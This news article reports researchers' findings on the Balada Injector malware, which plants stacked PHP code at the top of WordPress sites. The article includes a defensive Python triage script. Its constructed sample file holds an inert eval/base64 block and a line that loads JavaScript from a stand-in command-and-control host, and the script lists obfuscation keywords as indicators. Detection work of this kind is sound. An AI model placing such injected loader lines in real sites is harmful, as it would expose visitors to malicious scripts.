Balada Injector Malware Is Reportedly Back

Balada Injector malware is reportedly back. One of the most worrying WordPress malware threats is making a comeback and, in the process, compromising websites across the internet.

Balada Injector Malware Is Back

The Balada Injector malware is alive and kicking again, compromising poorly protected WordPress websites across the internet and using them to target visitors, new research claims.

A recent report from researchers at Cybernews says they found a compromised WordPress website during a “routine web monitoring operation”.

How the Affected Website Was Targeted and Attacked

The compromised website was apparently targeted by the Balada Injector malware, a Linux-based backdoor used to infiltrate websites through known vulnerabilities in WordPress plugins, themes and similar components. The Balada Injector is known for attacking in “waves”: roughly every month, the injector uses a new domain name and new code, which it then tries to add to the code of the WordPress site.

This particular site had seven different instances of malicious code added and stacked on top of one another, meaning the website suffered seven “waves” of hacking attacks. The code, added to the very top of the page so that it ran before the website loaded, was meant to grant the threat actors remote access to infected machines and to redirect visitors to other websites running malvertising campaigns.

How the Researchers Found the Malware

When the researchers carrying out the routine check deobfuscated and examined some of the PHP payloads found on the compromised website, they discovered URLs of newly spawned Command & Control (C2) endpoints, as well as further obfuscated JavaScript files, used in the operation. In total, the researchers found five URLs being accessed to load malicious JavaScript onto exploited websites.
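A triage check for the two observations above (injected PHP stacked at the top of the file in successive waves, and obfuscated payloads that reference remote JavaScript), added here as an illustration and not taken from the Cybernews report. It assumes a WordPress entry file such as index.php, whose own code opens with a single `<?php` that is never closed, so closed `<?php ... ?>` blocks before it are candidates for prepended waves; the sample file, placeholder payloads and the `example.invalid` host are all constructed.

```python
import re
from typing import Dict, List

# Constructed sample, not taken from the report: a WordPress index.php with two
# closed PHP blocks stacked above the legitimate file header, the way successive
# injection "waves" would leave them. Both payloads are inert placeholders.
SAMPLE_INDEX_PHP = (
    '<?php if(!isset($GLOBALS["wave1"])){$GLOBALS["wave1"]=1;'
    'eval(base64_decode("cGxhY2Vob2xkZXI="));} ?>'
    '<?php $u="https://c2.example.invalid/load.js";'
    'echo "<script src=\\"".str_rot13($u)."\\"></script>"; ?>\n'
    "<?php\n"
    "/**\n * Front to the WordPress application.\n */\n"
    "define( 'WP_USE_THEMES', true );\n"
    "require __DIR__ . '/wp-blog-header.php';\n"
)

# A run of closed <?php ... ?> blocks at the very start of the file. Assumption:
# the entry file's own code opens with one <?php that is never closed (true of
# WordPress core entry files such as index.php), so anything closed before it
# was prepended and is a candidate injected wave.
PREPENDED_RUN = re.compile(r"\A\s*((?:<\?php.*?\?>\s*)+)", re.DOTALL)
ONE_BLOCK = re.compile(r"<\?php.*?\?>", re.DOTALL)

# Common obfuscation primitives used by injected PHP; their presence is a
# triage signal for a human to review, not proof of compromise.
INDICATORS = ("eval(", "base64_decode(", "gzinflate(", "str_rot13(",
              "create_function(", "assert(")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def triage_prepended_blocks(src: str) -> List[Dict]:
    """Return one record per prepended block: its position in the stack,
    which obfuscation indicators it uses, and any URLs it references."""
    run = PREPENDED_RUN.match(src)
    if not run:
        return []
    findings = []
    for wave, block in enumerate(ONE_BLOCK.findall(run.group(1)), start=1):
        findings.append({
            "wave": wave,
            "indicators": [k for k in INDICATORS if k in block],
            "urls": URL_RE.findall(block),
        })
    return findings


if __name__ == "__main__":
    for finding in triage_prepended_blocks(SAMPLE_INDEX_PHP):
        print(finding)
```

Theme templates and other files that legitimately close the PHP tag before HTML will trip the prepended-block heuristic, so run it only over files that should start with an unclosed `<?php` and review the extracted URLs by hand.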

Good News for Potential Victims

The good news for potential victims is that the Balada Injector is still not as advanced as it could be. It does not check whether a compromised website already has malicious code added, and because of that, instead of serving the landing page, the website forced the download of a PHP file, which raised red flags with the researchers and ultimately helped uncover the hacking campaign.
